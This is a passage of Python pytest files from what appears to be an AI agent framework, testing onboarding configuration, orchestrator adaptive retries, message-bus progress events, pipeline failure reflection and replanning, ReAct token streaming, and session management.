        assert "DEEPSEEK_API_KEY=sk-deepseek" in env_content
        assert "DASHSCOPE_API_KEY=sk-dashscope" in env_content

    def test_onboarding_cancelled_on_empty_api_key(self, tmp_path, monkeypatch):
        """Onboarding should return None if API key is empty."""
        monkeypatch.chdir(tmp_path)
        # Keep HOME inside tmp_path like the sibling tests, so a regression in
        # the cancel path cannot write into the real home directory.
        monkeypatch.setenv("HOME", str(tmp_path / "home"))
        (tmp_path / "home").mkdir(exist_ok=True)
        with patch("agentkit.cli.onboarding.Prompt") as mock_prompt:
            mock_prompt.ask.side_effect = ["1", ""]  # Empty API key
            result = run_onboarding(output_dir=str(tmp_path))
        assert result is None

    def test_onboarding_config_has_memory_backend(self, tmp_path, monkeypatch):
        """Generated config should use memory backends by default."""
        monkeypatch.chdir(tmp_path)
        monkeypatch.setenv("HOME", str(tmp_path / "home"))
        (tmp_path / "home").mkdir(exist_ok=True)
        with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
                patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
            mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
            mock_confirm.ask.return_value = False
            config_path = run_onboarding(output_dir=str(tmp_path))
        with open(config_path, encoding="utf-8") as f:
            config = yaml.safe_load(f)
        assert config["session"]["backend"] == "memory"
        assert config["bus"]["backend"] == "memory"
        assert config["task_store"]["backend"] == "memory"
class TestOnboardingSoulGeneration:
    """U5: onboarding writes ``SOUL.md`` under ``$HOME/.agentkit``."""

    @staticmethod
    def _onboard(tmp_path, monkeypatch, answers):
        """Run onboarding with mocked prompts; return the isolated home dir.

        ``answers`` feeds ``Prompt.ask`` in order; ``Confirm.ask`` always
        answers ``False``.
        """
        monkeypatch.chdir(tmp_path)
        fake_home = tmp_path / "home"
        fake_home.mkdir(exist_ok=True)
        monkeypatch.setenv("HOME", str(fake_home))
        with patch("agentkit.cli.onboarding.Prompt") as prompt_cls, \
                patch("agentkit.cli.onboarding.Confirm") as confirm_cls:
            prompt_cls.ask.side_effect = answers
            confirm_cls.ask.return_value = False
            run_onboarding(output_dir=str(tmp_path))
        return fake_home

    def test_onboarding_creates_soul_md(self, tmp_path, monkeypatch):
        """Onboarding should create SOUL.md with custom agent name."""
        fake_home = self._onboard(
            tmp_path,
            monkeypatch,
            ["1", "sk-test-key", "1", "小王", "友好耐心", "简洁专业"],
        )
        # Verify SOUL.md was created with the custom answers in it.
        soul_file = fake_home / ".agentkit" / "SOUL.md"
        assert soul_file.exists()
        soul_text = soul_file.read_text(encoding="utf-8")
        for expected in ("小王", "友好耐心", "简洁专业"):
            assert expected in soul_text

    def test_onboarding_soul_with_defaults(self, tmp_path, monkeypatch):
        """Onboarding with default personality should create default SOUL.md."""
        # Prompt.ask returns the default when the user presses Enter, so the
        # mock has to hand back the actual default values.
        fake_home = self._onboard(
            tmp_path,
            monkeypatch,
            ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"],
        )
        soul_file = fake_home / ".agentkit" / "SOUL.md"
        assert soul_file.exists()
        soul_text = soul_file.read_text(encoding="utf-8")
        assert "AgentKit" in soul_text

View File

@ -0,0 +1,236 @@
"""Tests for Orchestrator adaptive task decomposition (U5)."""
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.core.orchestrator import (
Orchestrator,
OrchestratorConfig,
OrchestrationResult,
SubTaskStatus,
)
from agentkit.core.protocol import TaskMessage, TaskStatus
# ── Test Helpers ──────────────────────────────────────────
def _make_task(**overrides) -> TaskMessage:
    """Build a ``TaskMessage`` from test defaults; keyword overrides win."""
    base_fields = {
        "task_id": "task-001",
        "agent_name": "test_agent",
        "task_type": "analyze",
        "priority": 0,
        "input_data": {"query": "test"},
        "callback_url": None,
        "created_at": datetime.now(timezone.utc),
        "timeout_seconds": 60,
    }
    merged = {**base_fields, **overrides}
    return TaskMessage(**merged)
def _make_mock_pool(agents: dict[str, AsyncMock] | None = None):
"""Create a mock AgentPool."""
pool = MagicMock()
if agents:
pool.get_agent = lambda name: agents.get(name)
pool.list_agents = lambda: [
{"name": name, "agent_type": "worker", "description": f"Agent {name}"}
for name in agents
]
else:
# Default: single agent that succeeds
mock_agent = AsyncMock()
mock_result = MagicMock()
mock_result.output_data = {"result": "done"}
mock_agent.execute = AsyncMock(return_value=mock_result)
pool.get_agent = lambda name: mock_agent
pool.list_agents = lambda: [
{"name": "test_agent", "agent_type": "worker", "description": "Test agent"}
]
return pool
# ── OrchestratorConfig Tests ──────────────────────────────
class TestOrchestratorConfig:
    """Default and custom field values of ``OrchestratorConfig``."""

    def test_default_values(self):
        """Defaults: adaptive off, three iterations, 0.7 quality threshold."""
        defaults = OrchestratorConfig()
        assert defaults.adaptive is False
        assert defaults.max_iterations == 3
        assert defaults.quality_threshold == 0.7

    def test_custom_values(self):
        """Values passed to the constructor are stored as given."""
        custom = OrchestratorConfig(adaptive=True, max_iterations=5, quality_threshold=0.9)
        assert custom.adaptive is True
        assert custom.max_iterations == 5
        assert custom.quality_threshold == 0.9
# ── Adaptive Execution Tests ─────────────────────────────
class TestOrchestratorAdaptive:
    """Adaptive execution, rule-based quality scoring and re-execution."""

    @staticmethod
    def _adaptive_orchestrator(**config_kwargs) -> Orchestrator:
        """Return an Orchestrator over the default mock pool with ``adaptive=True``."""
        return Orchestrator(
            agent_pool=_make_mock_pool(),
            config=OrchestratorConfig(adaptive=True, **config_kwargs),
        )

    @staticmethod
    def _result(
        subtask_results,
        status=TaskStatus.COMPLETED,
        parent_task_id="t1",
    ) -> OrchestrationResult:
        """Build an ``OrchestrationResult`` with fixed plan id and duration."""
        return OrchestrationResult(
            plan_id="p1",
            parent_task_id=parent_task_id,
            subtask_results=subtask_results,
            aggregated_result={},
            status=status,
            total_duration_ms=100,
        )

    @pytest.mark.asyncio
    async def test_adaptive_false_behaves_like_execute(self):
        """When adaptive=False, execute_adaptive should behave like execute."""
        orchestrator = Orchestrator(
            agent_pool=_make_mock_pool(),
            config=OrchestratorConfig(adaptive=False),
        )
        outcome = await orchestrator.execute_adaptive(_make_task())
        assert outcome.status == TaskStatus.COMPLETED

    @pytest.mark.asyncio
    async def test_rule_based_evaluate_all_completed(self):
        """All completed subtasks should score 1.0."""
        orchestrator = self._adaptive_orchestrator()
        all_done = self._result(
            {
                "st1": {"status": "completed", "output": "ok"},
                "st2": {"status": "completed", "output": "ok"},
            }
        )
        verdict = orchestrator._rule_based_evaluate(all_done)
        assert verdict["score"] == 1.0

    @pytest.mark.asyncio
    async def test_rule_based_evaluate_partial(self):
        """Partial completion should score proportionally."""
        orchestrator = self._adaptive_orchestrator()
        half_done = self._result(
            {
                "st1": {"status": "completed", "output": "ok"},
                "st2": {"status": "failed", "error": "bad"},
            }
        )
        verdict = orchestrator._rule_based_evaluate(half_done)
        assert verdict["score"] == 0.5
        assert "st2" in verdict["feedback"]

    @pytest.mark.asyncio
    async def test_rule_based_evaluate_empty(self):
        """No subtasks should score 0.0."""
        orchestrator = self._adaptive_orchestrator()
        nothing_ran = self._result({}, status=TaskStatus.FAILED)
        verdict = orchestrator._rule_based_evaluate(nothing_ran)
        assert verdict["score"] == 0.0

    @pytest.mark.asyncio
    async def test_adaptive_first_round_pass(self):
        """If first round quality passes, return directly."""
        orchestrator = self._adaptive_orchestrator(quality_threshold=0.5)
        outcome = await orchestrator.execute_adaptive(_make_task())
        # The mock agent completes every subtask, so quality = 1.0 >= 0.5.
        assert outcome.status == TaskStatus.COMPLETED

    @pytest.mark.asyncio
    async def test_orchestration_result_metadata(self):
        """OrchestrationResult should have metadata field."""
        bare = self._result({})
        assert bare.metadata == {}

    @pytest.mark.asyncio
    async def test_reexecute_failed_preserves_completed(self):
        """_reexecute_failed should keep completed subtask results."""
        orchestrator = self._adaptive_orchestrator()
        task = _make_task()
        earlier = self._result(
            {
                "st1": {"status": "completed", "output": "ok"},
                "st2": {"status": "failed", "error": "bad"},
            },
            parent_task_id="task-001",
        )
        verdict = {"score": 0.5, "feedback": "Fix st2"}
        rerun = await orchestrator._reexecute_failed(task, earlier, verdict)
        # st1 had already completed and must be carried over untouched.
        assert "st1" in rerun.subtask_results
        assert rerun.subtask_results["st1"]["status"] == "completed"

    @pytest.mark.asyncio
    async def test_max_iterations_respected(self):
        """Adaptive loop should not exceed max_iterations."""
        # Pool whose only agent raises on every execute call.
        failing_agent = AsyncMock()
        failing_agent.execute = AsyncMock(side_effect=RuntimeError("always fails"))
        failing_pool = MagicMock()
        failing_pool.get_agent = lambda name: failing_agent
        failing_pool.list_agents = lambda: [
            {"name": "test_agent", "agent_type": "worker", "description": "Test"}
        ]
        orchestrator = Orchestrator(
            agent_pool=failing_pool,
            config=OrchestratorConfig(
                adaptive=True,
                max_iterations=2,
                quality_threshold=0.9,
            ),
        )
        outcome = await orchestrator.execute_adaptive(_make_task())
        # The call must return with a terminal status rather than loop forever.
        assert outcome.status in (TaskStatus.FAILED, TaskStatus.COMPLETED)

View File

@ -0,0 +1,118 @@
"""Tests for Orchestrator + MessageBus integration (U7)."""
import asyncio
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.core.orchestrator import Orchestrator, OrchestratorConfig
from agentkit.core.protocol import TaskMessage, TaskStatus
def _make_task(**overrides) -> TaskMessage:
    """Return a ``TaskMessage`` built from test defaults plus ``overrides``."""
    task_fields = dict(
        task_id="task-001",
        agent_name="test_agent",
        task_type="analyze",
        priority=0,
        input_data={"query": "test"},
        callback_url=None,
        created_at=datetime.now(timezone.utc),
        timeout_seconds=60,
    )
    # Caller-supplied values take precedence over the defaults.
    for field_name, value in overrides.items():
        task_fields[field_name] = value
    return TaskMessage(**task_fields)
def _make_mock_pool():
    """Create a mock AgentPool with a working agent.

    ``get_agent`` returns the same agent for any name; its ``execute``
    resolves to a result whose ``output_data`` is ``{"result": "done"}``.
    ``list_agents`` reports a single ``test_agent`` worker.
    """
    outcome = MagicMock()
    outcome.output_data = {"result": "done"}

    worker = AsyncMock()
    worker.execute = AsyncMock(return_value=outcome)

    def get_agent(name):
        return worker

    def list_agents():
        return [
            {"name": "test_agent", "agent_type": "worker", "description": "Test agent"}
        ]

    pool = MagicMock()
    pool.get_agent = get_agent
    pool.list_agents = list_agents
    return pool
class TestOrchestratorWithMessageBus:
    """Orchestrator behaviour with and without an injected MessageBus."""

    @pytest.mark.asyncio
    async def test_worker_publishes_progress(self):
        """Worker should publish progress via MessageBus after execution."""
        bus = InMemoryMessageBus()
        pool = _make_mock_pool()
        orch = Orchestrator(agent_pool=pool, message_bus=bus)
        # Subscribe as "orchestrator" to collect the progress messages.
        progress_messages: list[AgentMessage] = []
        await bus.subscribe("orchestrator", lambda msg: progress_messages.append(msg))
        task = _make_task()
        result = await orch.execute(task)
        assert result.status == TaskStatus.COMPLETED
        # Poll with a deadline instead of one fixed sleep: the test finishes
        # as soon as a message is delivered and tolerates slow CI machines.
        loop = asyncio.get_running_loop()
        deadline = loop.time() + 2.0
        while not progress_messages and loop.time() < deadline:
            await asyncio.sleep(0.01)
        assert len(progress_messages) >= 1
        assert progress_messages[0].topic == "task.progress"

    @pytest.mark.asyncio
    async def test_no_message_bus_works_normally(self):
        """Without MessageBus, Orchestrator should work normally."""
        pool = _make_mock_pool()
        orch = Orchestrator(agent_pool=pool)
        task = _make_task()
        result = await orch.execute(task)
        assert result.status == TaskStatus.COMPLETED

    @pytest.mark.asyncio
    async def test_message_bus_injected_via_config(self):
        """MessageBus should be injectable via constructor."""
        bus = InMemoryMessageBus()
        pool = _make_mock_pool()
        config = OrchestratorConfig(adaptive=True)
        orch = Orchestrator(
            agent_pool=pool,
            message_bus=bus,
            config=config,
        )
        assert orch._message_bus is bus
class TestAgentPoolWithMessageBus:
    """``AgentPool`` construction with and without a MessageBus."""

    @pytest.mark.asyncio
    async def test_agent_registered_to_bus_on_create(self):
        """A pool built with a bus keeps a reference to that same bus."""
        from agentkit.core.agent_pool import AgentPool
        from agentkit.llm.gateway import LLMGateway
        from agentkit.skills.registry import SkillRegistry

        injected_bus = InMemoryMessageBus()
        agent_pool = AgentPool(
            llm_gateway=MagicMock(spec=LLMGateway),
            skill_registry=SkillRegistry(),
            message_bus=injected_bus,
        )
        # Only the stored reference is checked here, not agent registration.
        assert agent_pool._message_bus is injected_bus

    @pytest.mark.asyncio
    async def test_pool_without_bus_works(self):
        """A pool built without a bus stores ``None`` for it."""
        from agentkit.core.agent_pool import AgentPool
        from agentkit.llm.gateway import LLMGateway
        from agentkit.skills.registry import SkillRegistry

        agent_pool = AgentPool(
            llm_gateway=MagicMock(spec=LLMGateway),
            skill_registry=SkillRegistry(),
        )
        assert agent_pool._message_bus is None

View File

@ -0,0 +1,285 @@
"""Tests for Pipeline reflection-replanning (U4)."""
import pytest
from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline,
PipelineResult,
PipelineStage,
ReflectionReport,
StageResult,
StageStatus,
)
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
# ── Test Helpers ──────────────────────────────────────────
def _make_pipeline(
    stages: list[dict] | None = None,
    name: str = "test_pipeline",
) -> Pipeline:
    """Build a version "1.0" ``Pipeline`` from plain stage dicts.

    When ``stages`` is ``None`` a two-step default (``step1`` on ``agent_a``,
    ``step2`` on ``agent_b``) is used; an explicit empty list is kept empty.
    """
    stage_specs = stages
    if stage_specs is None:
        stage_specs = [
            {"name": "step1", "agent": "agent_a", "action": "do_thing"},
            {"name": "step2", "agent": "agent_b", "action": "do_other"},
        ]
    return Pipeline(
        name=name,
        version="1.0",
        description="Test pipeline",
        stages=[PipelineStage(**spec) for spec in stage_specs],
    )
def _make_failed_result(
    pipeline_name: str = "test_pipeline",
    failed_stage: str = "step2",
    error_message: str = "Connection timeout after 300s",
    completed_stages: dict[str, dict] | None = None,
) -> PipelineResult:
    """Create a ``PipelineResult`` whose overall status is FAILED.

    Every entry of *completed_stages* (stage name -> output data) becomes a
    COMPLETED ``StageResult``; *failed_stage* is then recorded as FAILED with
    *error_message*, replacing any completed entry of the same name.
    """
    per_stage = {
        stage_name: StageResult(
            stage_name=stage_name,
            status=StageStatus.COMPLETED,
            output_data=payload,
        )
        for stage_name, payload in (completed_stages or {}).items()
    }
    # Written last so the failure always wins over a same-named completed entry.
    per_stage[failed_stage] = StageResult(
        stage_name=failed_stage,
        status=StageStatus.FAILED,
        error_message=error_message,
    )

    return PipelineResult(
        pipeline_name=pipeline_name,
        status=StageStatus.FAILED,
        stage_results=per_stage,
        error_message=f"Stage '{failed_stage}' failed",
    )
# ── PipelineReflector Tests ──────────────────────────────
class TestPipelineReflector:
    """Exercises ``PipelineReflector.reflect`` against hand-built failed results."""

    @pytest.mark.asyncio
    async def test_rule_based_timeout_reflection(self):
        """A timeout error message is classified as 'timeout'."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(error_message="Timeout after 300s")

        analysis = await sut.reflect(plan, outcome)

        assert analysis.failure_type == "timeout"
        assert "step2" in analysis.root_cause
        assert "timeout" in analysis.suggested_fix.lower()

    @pytest.mark.asyncio
    async def test_rule_based_resource_error_reflection(self):
        """A not-found error message is classified as 'resource_error'."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(error_message="Resource not found: database")

        analysis = await sut.reflect(plan, outcome)

        assert analysis.failure_type == "resource_error"

    @pytest.mark.asyncio
    async def test_rule_based_input_error_reflection(self):
        """An invalid-input error message is classified as 'input_error'."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(error_message="Invalid input: missing field 'name'")

        analysis = await sut.reflect(plan, outcome)

        assert analysis.failure_type == "input_error"

    @pytest.mark.asyncio
    async def test_rule_based_logic_error_reflection(self):
        """An otherwise unrecognised error message falls back to 'logic_error'."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(error_message="Unexpected state transition")

        analysis = await sut.reflect(plan, outcome)

        assert analysis.failure_type == "logic_error"

    @pytest.mark.asyncio
    async def test_reflection_report_fields(self):
        """The report carries the failed stage, the reflection number and non-empty text."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(error_message="Timeout")

        analysis = await sut.reflect(plan, outcome, reflection_number=2)

        assert analysis.failed_stage == "step2"
        assert analysis.reflection_number == 2
        assert analysis.root_cause
        assert analysis.suggested_fix

    @pytest.mark.asyncio
    async def test_reflection_with_completed_outputs(self):
        """Completed stage outputs in the result do not change the reported failed stage."""
        sut = PipelineReflector()
        plan = _make_pipeline()
        outcome = _make_failed_result(
            error_message="Error",
            completed_stages={"step1": {"data": "value"}},
        )

        analysis = await sut.reflect(plan, outcome)

        assert analysis.failed_stage == "step2"
# ── PipelineReplanner Tests ──────────────────────────────
class TestPipelineReplanner:
    """Exercises ``PipelineReplanner.replan`` with hand-written reflection reports."""

    @pytest.mark.asyncio
    async def test_replan_preserves_completed_stages(self):
        """The replanned pipeline still has both stages, with step1 first."""
        sut = PipelineReplanner()
        original = _make_pipeline()
        outcome = _make_failed_result(
            completed_stages={"step1": {"data": "ok"}},
        )
        diagnosis = ReflectionReport(
            failure_type="timeout",
            root_cause="Step timed out",
            suggested_fix="Increase timeout",
            failed_stage="step2",
        )

        revised = await sut.replan(original, outcome, diagnosis)

        assert len(revised.stages) == 2
        assert revised.stages[0].name == "step1"

    @pytest.mark.asyncio
    async def test_replan_adjusts_timeout_stage(self):
        """A timeout diagnosis raises the failed stage's timeout from 300 to 600."""
        sut = PipelineReplanner()
        original = _make_pipeline([
            {"name": "step1", "agent": "a", "action": "do"},
            {"name": "step2", "agent": "b", "action": "do", "timeout_seconds": 300},
        ])
        outcome = _make_failed_result(error_message="Timeout after 300s")
        diagnosis = ReflectionReport(
            failure_type="timeout",
            root_cause="Timeout",
            suggested_fix="Increase timeout",
            failed_stage="step2",
        )

        revised = await sut.replan(original, outcome, diagnosis)

        retried = next(stage for stage in revised.stages if stage.name == "step2")
        assert retried.timeout_seconds == 600  # twice the original 300
        assert retried.retry_policy is not None

    @pytest.mark.asyncio
    async def test_replan_resource_error_sets_continue_on_failure(self):
        """A resource_error diagnosis marks the failed stage continue_on_failure."""
        sut = PipelineReplanner()
        original = _make_pipeline()
        outcome = _make_failed_result(error_message="Not found")
        diagnosis = ReflectionReport(
            failure_type="resource_error",
            root_cause="Resource missing",
            suggested_fix="Skip and continue",
            failed_stage="step2",
        )

        revised = await sut.replan(original, outcome, diagnosis)

        tolerated = next(stage for stage in revised.stages if stage.name == "step2")
        assert tolerated.continue_on_failure is True

    @pytest.mark.asyncio
    async def test_replan_name_includes_replanned(self):
        """The replanned pipeline's name contains the word 'replanned'."""
        sut = PipelineReplanner()
        original = _make_pipeline()
        outcome = _make_failed_result()
        diagnosis = ReflectionReport(
            failure_type="logic_error",
            root_cause="Bad logic",
            suggested_fix="Fix logic",
            failed_stage="step2",
        )

        revised = await sut.replan(original, outcome, diagnosis)

        assert "replanned" in revised.name
# ── PipelineEngine Adaptive Integration Tests ────────────
class TestPipelineEngineAdaptive:
    """Integration-style checks around ``PipelineEngine.execute`` and AdaptiveConfig."""

    @pytest.mark.asyncio
    async def test_adaptive_disabled_no_reflection(self):
        """Executing without an adaptive_config returns the plain result."""
        # PipelineEngine() with no arguments is what the original author
        # calls "dry-run mode"; the single stage is expected to complete.
        engine = PipelineEngine()
        single_stage = _make_pipeline([
            {"name": "fail_step", "agent": "a", "action": "fail",
             "continue_on_failure": False},
        ])

        outcome = await engine.execute(single_stage)

        # Nothing fails in this setup, so no reflection is involved.
        assert outcome.status == StageStatus.COMPLETED

    @pytest.mark.asyncio
    async def test_adaptive_enabled_triggers_reflection_on_failure(self):
        """A pipeline with a dependency cycle ends FAILED even with adaptive enabled."""
        engine = PipelineEngine()
        # step1 and step2 depend on each other, forming a cycle.
        cyclic = _make_pipeline([
            {"name": "step1", "agent": "a", "action": "do",
             "depends_on": ["step2"]},
            {"name": "step2", "agent": "b", "action": "do",
             "depends_on": ["step1"]},
        ])
        adaptive = AdaptiveConfig(enabled=True, max_reflections=2)

        outcome = await engine.execute(cyclic, adaptive_config=adaptive)

        # Per the original author's note, the cycle is rejected before any
        # stage runs (topological sort fails), so no reflections happen;
        # only the final status is asserted here.
        assert outcome.status == StageStatus.FAILED

    @pytest.mark.asyncio
    async def test_adaptive_config_default_disabled(self):
        """Defaults: adaptive is off and max_reflections is 3."""
        defaults = AdaptiveConfig()
        assert defaults.enabled is False
        assert defaults.max_reflections == 3

    @pytest.mark.asyncio
    async def test_pipeline_result_metadata_field(self):
        """A freshly built PipelineResult exposes an empty ``metadata`` dict."""
        fresh = PipelineResult(pipeline_name="test")
        assert fresh.metadata == {}

    @pytest.mark.asyncio
    async def test_reflection_report_model_dump(self):
        """``model_dump()`` on a ReflectionReport returns the field values."""
        diagnosis = ReflectionReport(
            failure_type="timeout",
            root_cause="Timed out",
            suggested_fix="Increase timeout",
            failed_stage="step1",
            reflection_number=1,
        )

        dumped = diagnosis.model_dump()

        assert dumped["failure_type"] == "timeout"
        assert dumped["reflection_number"] == 1

View File

@ -0,0 +1,127 @@
"""Tests for ReAct engine token streaming via execute_stream()."""
import pytest
from unittest.mock import AsyncMock, MagicMock
from agentkit.core.react import ReActEngine, ReActEvent
from agentkit.llm.gateway import LLMGateway
from agentkit.llm.protocol import LLMResponse, StreamChunk, TokenUsage
def _make_stream_chunks(
    content_parts: list[str],
    model: str = "test-model",
    usage: TokenUsage | None = None,
) -> list[StreamChunk]:
    """Return StreamChunks that mimic one streamed LLM response.

    One chunk is produced per entry of *content_parts*, followed by a final
    empty-content chunk flagged ``is_final=True`` that carries *usage* (or a
    default ``TokenUsage`` of 10 prompt / 20 completion tokens).
    """
    content_chunks = [
        StreamChunk(content=text, model=model) for text in content_parts
    ]
    closing_chunk = StreamChunk(
        content="",
        model=model,
        usage=usage or TokenUsage(prompt_tokens=10, completion_tokens=20),
        is_final=True,
    )
    return [*content_chunks, closing_chunk]
def _make_stream_gateway(chunks_list: list[list[StreamChunk]]) -> MagicMock:
    """Create a mock LLMGateway whose ``chat_stream`` replays queued responses.

    Args:
        chunks_list: Queue of responses; each inner list holds the chunks of
            one streamed response. The list is consumed in place.

    Returns:
        A ``MagicMock(spec=LLMGateway)`` whose ``chat_stream`` attribute is an
        async generator function. Each call removes the next response from
        the front of *chunks_list* and yields its chunks; once the queue is
        empty a call yields nothing.
    """
    gateway = MagicMock(spec=LLMGateway)

    async def _stream(**kwargs):
        # Take exactly one response per call. The earlier version called
        # pop(0) on the list while a ``for`` loop was iterating over it,
        # which skips or merges entries as soon as more than one response
        # is queued.
        if not chunks_list:
            return
        for chunk in chunks_list.pop(0):
            yield chunk

    gateway.chat_stream = _stream
    return gateway
class TestReActTokenStreaming:
    """Covers ``ReActEngine.execute_stream`` events and the stream-to-response helper."""

    @pytest.mark.asyncio
    async def test_yields_token_events(self):
        """Each non-final stream chunk shows up as one 'token' event, in order."""
        gateway = _make_stream_gateway(
            [_make_stream_chunks(["Hello", " world", "!"])]
        )
        engine = ReActEngine(llm_gateway=gateway)

        collected = [
            event
            async for event in engine.execute_stream(
                messages=[{"role": "user", "content": "Hi"}],
            )
        ]

        tokens = [e for e in collected if e.event_type == "token"]
        assert len(tokens) == 3
        assert tokens[0].data["content"] == "Hello"
        assert tokens[1].data["content"] == " world"
        assert tokens[2].data["content"] == "!"

    @pytest.mark.asyncio
    async def test_final_answer_after_streaming(self):
        """Exactly one 'final_answer' event is emitted and it contains the text."""
        gateway = _make_stream_gateway(
            [_make_stream_chunks(["The answer is 42"])]
        )
        engine = ReActEngine(llm_gateway=gateway)

        collected = [
            event
            async for event in engine.execute_stream(
                messages=[{"role": "user", "content": "What?"}],
            )
        ]

        finals = [e for e in collected if e.event_type == "final_answer"]
        assert len(finals) == 1
        assert "42" in finals[0].data.get("output", "")

    @pytest.mark.asyncio
    async def test_token_events_have_correct_step(self):
        """Every 'token' event reports a step number of at least 1."""
        gateway = _make_stream_gateway([_make_stream_chunks(["Hi"])])
        engine = ReActEngine(llm_gateway=gateway)

        collected = [
            event
            async for event in engine.execute_stream(
                messages=[{"role": "user", "content": "Hi"}],
            )
        ]

        tokens = [e for e in collected if e.event_type == "token"]
        assert all(token.step >= 1 for token in tokens)

    @pytest.mark.asyncio
    async def test_build_response_from_stream(self):
        """``_build_response_from_stream`` copies content, model and usage through."""
        token_usage = TokenUsage(prompt_tokens=5, completion_tokens=10)

        built = ReActEngine._build_response_from_stream(
            content="Hello world",
            tool_calls=[],
            usage=token_usage,
            model="test-model",
        )

        assert built.content == "Hello world"
        assert built.model == "test-model"
        assert built.usage.prompt_tokens == 5
        assert built.usage.completion_tokens == 10
        assert not built.has_tool_calls

    @pytest.mark.asyncio
    async def test_build_response_from_stream_no_usage(self):
        """With ``usage=None`` the built response reports zero prompt tokens."""
        built = ReActEngine._build_response_from_stream(
            content="test",
            tool_calls=[],
            usage=None,
            model="test-model",
        )

        assert built.content == "test"
        assert built.usage.prompt_tokens == 0

View File

@ -0,0 +1,199 @@
"""Tests for SessionManager."""
import pytest
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole, SessionStatus
from agentkit.session.store import InMemorySessionStore
@pytest.fixture
def manager():
    """Provide a SessionManager backed by a new InMemorySessionStore."""
    backing_store = InMemorySessionStore()
    return SessionManager(store=backing_store)
class TestSessionManagerCreate:
    """Session creation through ``SessionManager.create_session``."""

    @pytest.mark.asyncio
    async def test_create_session(self, manager):
        """A new session has an id, the given agent name and ACTIVE status."""
        created = await manager.create_session(agent_name="test-agent")

        assert created.session_id is not None
        assert created.agent_name == "test-agent"
        assert created.status == SessionStatus.ACTIVE

    @pytest.mark.asyncio
    async def test_create_session_with_metadata(self, manager):
        """Metadata passed at creation is stored on the session."""
        created = await manager.create_session(
            agent_name="agent1",
            metadata={"user_id": "u1"},
        )

        assert created.metadata == {"user_id": "u1"}
class TestSessionManagerGet:
    """Session lookup through ``SessionManager.get_session``."""

    @pytest.mark.asyncio
    async def test_get_existing_session(self, manager):
        """Looking up a created session returns one with the same id."""
        original = await manager.create_session(agent_name="agent1")

        looked_up = await manager.get_session(original.session_id)

        assert looked_up is not None
        assert looked_up.session_id == original.session_id

    @pytest.mark.asyncio
    async def test_get_nonexistent_session(self, manager):
        """Looking up an unknown id returns None."""
        looked_up = await manager.get_session("nonexistent")
        assert looked_up is None
class TestSessionManagerLifecycle:
    """Pause, resume, close and delete transitions on SessionManager."""

    @pytest.mark.asyncio
    async def test_pause_and_resume(self, manager):
        """Pausing yields PAUSED; resuming afterwards yields ACTIVE again."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id

        after_pause = await manager.pause_session(sid)
        assert after_pause.status == SessionStatus.PAUSED

        after_resume = await manager.resume_session(sid)
        assert after_resume.status == SessionStatus.ACTIVE

    @pytest.mark.asyncio
    async def test_close_session(self, manager):
        """Closing a session returns it with CLOSED status."""
        created = await manager.create_session(agent_name="agent1")

        after_close = await manager.close_session(created.session_id)

        assert after_close.status == SessionStatus.CLOSED

    @pytest.mark.asyncio
    async def test_close_nonexistent_returns_none(self, manager):
        """Closing an unknown session id returns None."""
        outcome = await manager.close_session("nonexistent")
        assert outcome is None

    @pytest.mark.asyncio
    async def test_delete_session(self, manager):
        """Deleting returns True and the session can no longer be fetched."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id

        was_deleted = await manager.delete_session(sid)

        assert was_deleted is True
        assert await manager.get_session(sid) is None

    @pytest.mark.asyncio
    async def test_delete_nonexistent_returns_false(self, manager):
        """Deleting an unknown session id returns False."""
        was_deleted = await manager.delete_session("nonexistent")
        assert was_deleted is False
class TestSessionManagerMessages:
    """Appending, reading, paging and counting messages via SessionManager."""

    @pytest.mark.asyncio
    async def test_append_user_message(self, manager):
        """An appended user message echoes its role, content and session id."""
        created = await manager.create_session(agent_name="agent1")

        stored = await manager.append_message(
            session_id=created.session_id,
            role=MessageRole.USER,
            content="Hello",
        )

        assert stored.role == MessageRole.USER
        assert stored.content == "Hello"
        assert stored.session_id == created.session_id

    @pytest.mark.asyncio
    async def test_append_assistant_message(self, manager):
        """An appended assistant message keeps the ASSISTANT role."""
        created = await manager.create_session(agent_name="agent1")

        stored = await manager.append_message(
            session_id=created.session_id,
            role=MessageRole.ASSISTANT,
            content="Hi there!",
        )

        assert stored.role == MessageRole.ASSISTANT

    @pytest.mark.asyncio
    async def test_get_messages(self, manager):
        """Messages come back in the order they were appended."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id
        await manager.append_message(session_id=sid, role=MessageRole.USER, content="Hello")
        await manager.append_message(session_id=sid, role=MessageRole.ASSISTANT, content="Hi!")

        history = await manager.get_messages(sid)

        assert len(history) == 2
        assert history[0].content == "Hello"
        assert history[1].content == "Hi!"

    @pytest.mark.asyncio
    async def test_get_messages_pagination(self, manager):
        """``limit``/``offset`` select consecutive windows of the history."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id
        for index in range(10):
            await manager.append_message(
                session_id=sid,
                role=MessageRole.USER,
                content=f"Message {index}",
            )

        # First window: messages 0..2.
        first_window = await manager.get_messages(sid, limit=3, offset=0)
        assert len(first_window) == 3
        assert first_window[0].content == "Message 0"

        # Second window: messages 3..5.
        second_window = await manager.get_messages(sid, limit=3, offset=3)
        assert len(second_window) == 3
        assert second_window[0].content == "Message 3"

    @pytest.mark.asyncio
    async def test_count_messages(self, manager):
        """The message count matches the number of appended messages."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id
